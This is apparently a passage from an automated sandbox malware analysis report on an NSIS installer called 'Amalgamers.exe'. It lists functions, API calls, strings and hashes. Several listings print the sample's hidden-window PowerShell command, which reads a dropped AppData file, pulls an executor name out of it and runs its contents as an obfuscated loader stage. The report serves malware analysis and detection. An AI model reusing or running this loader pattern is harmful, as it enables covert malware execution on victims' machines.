Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403003
GetTickCount.KERNEL32 ref: 004030AA
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030D3
wsprintfA.USER32 ref: 004030E3

Strings

9UA, xrefs: 00403070, 00403082
... %d%%, xrefs: 004030DD
svrdlilje gogopigerne irresponsive frigoric,schferhunden uddelighedernes inspirer levodopa fintskaarnes exonerative buspassagerer interrelations bourgeoisies soldadoscalamumi parmigiana spoliated sekundovioliner stract inorthography jnedes,vandreaar magnat n, xrefs: 0040301D
(TA, xrefs: 0040315D
(TA, xrefs: 00403059

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: (TA$(TA$... %d%%$9UA$svrdlilje gogopigerne irresponsive frigoric,schferhunden uddelighedernes inspirer levodopa fintskaarnes exonerative buspassagerer interrelations bourgeoisies soldadoscalamumi parmigiana spoliated sekundovioliner stract inorthography jnedes,vandreaar magnat n
API String ID: 551687249-2811085358
Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",C:\Users\user\AppData\Local\Reglements216\Fessewise,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,00000000,powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",C:\Users\user\AppData\Local\Reglements216\Fessewise,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Topfartens Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004050C7: lstrlenA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",004030F7,004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Windows\Fonts\Flerried.asi, xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\Reglements216\Fessewise, xrefs: 00401786
powershell.exe -windowstyle hidden, xrefs: 0040180D, 00401819, 00401831

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Reglements216\Fessewise$C:\Windows\Fonts\Flerried.asi$powershell.exe -windowstyle hidden$powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
API String ID: 1941528284-1811483683
Opcode ID: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
Opcode Fuzzy Hash: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
lstrlenA.KERNEL32(004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
lstrcatA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",004030F7,004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0), ref: 00405123
SetWindowTextA.USER32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405135
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", xrefs: 004050E7, 004050F9, 004050FF, 00405122, 0040512E

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
API String ID: 2531174081-3634379012
Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
wsprintfA.USER32 ref: 0040631A
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Strings

UXTHEME, xrefs: 004062D3
\, xrefs: 004062F2
%s%s.dll, xrefs: 00406314

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

Function 00405B68 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B7C
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
"C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00405B68
nsa, xrefs: 00405B73

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Amalgamers.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3913210336
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040558D: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Reglements216\Fessewise,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Reglements216\Fessewise, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Reglements216\Fessewise
API String ID: 1892508949-2812723231
Opcode ID: 906da369be0d39d3f7caf60511ffc24c4b77757406bd8c2e1d0cca4ec0646839
Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
Opcode Fuzzy Hash: 906da369be0d39d3f7caf60511ffc24c4b77757406bd8c2e1d0cca4ec0646839
Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
CloseHandle.KERNEL32(?), ref: 00405675

Strings

Error launching installer, xrefs: 00405652

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

Function 004023D6 Relevance: 4.6, APIs: 3, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(0040AC18,00000023,00000011,00000002), ref: 00402421
RegSetValueExA.ADVAPI32(?,?,?,?,0040AC18,00000000,00000011,00000002), ref: 0040245E
RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 9b4603d551612266685cde4e1ab5df1b2e55abde835717a16c608a83efa67158
Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
Opcode Fuzzy Hash: 9b4603d551612266685cde4e1ab5df1b2e55abde835717a16c608a83efa67158
Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68

Function 00402473 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 339b0f58268b4c7f9437df92a49e2b39a987b7be1543b21b52b8f9d41d406249
Instruction ID: 95e09d1afac246f862a709281cbe64e29327228dc2655ecd66478bf0894335ce
Opcode Fuzzy Hash: 339b0f58268b4c7f9437df92a49e2b39a987b7be1543b21b52b8f9d41d406249
Instruction Fuzzy Hash: 9811A371A01205FFDB15DF64DA989AEBBB4DF10348F20843FE445B72C0D6B84A85DB69

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C

Function 00406338 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
